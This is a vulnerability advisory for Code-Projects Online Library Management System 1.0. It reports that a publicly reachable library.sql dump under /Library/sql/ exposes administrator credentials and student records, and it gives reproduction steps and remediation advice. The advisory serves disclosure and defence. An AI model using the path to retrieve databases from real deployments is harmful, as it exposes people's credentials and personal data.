Code-Projects Online Library Management System Information Disclosure Vulnerability

A sensitive information disclosure vulnerability has been identified in Code-Projects Online Library Management System version 1.0. The issue arises from an exposed SQL database backup file, 'library.sql', which is accessible in a publicly available directory under the web root. The web server's lack of restrictions on .sql file access allows any unauthenticated user to download the database dump via HTTP. This database dump contains the full schema and application data, including sensitive information such as user accounts, student records, issued books, and administrative credentials. The vulnerability results from insecure deployment practices and improper server configuration, leaving sensitive data exposed to unauthorized users.

Impact

Exploitation of this vulnerability allows unauthorized access to sensitive information, including administrator credentials, student or user account data, records of issued books, email addresses, and personal information. This could lead to account compromises, unauthorized administrative access, credential reuse attacks, data manipulation or deletion, further application compromises, and in severe cases, full control over the system database.

Reproduction

To reproduce this vulnerability, install the Online Library Management System in PHP version 1.0. After installation, navigate to the '/Library/sql/' directory on the web server. The 'library.sql' file can be accessed directly via HTTP, without any authentication. Once downloaded, the file can be opened to reveal sensitive information, such as administrator credentials and user data.

Remediation

It is recommended to remove SQL backup files from the web root and store them in secure locations that are not publicly accessible. Access to SQL files should be restricted through server configuration, such as using Apache or Nginx rules to deny access to .sql files. Additionally, directory listing should be disabled, strict file permissions applied, and regular security audits conducted.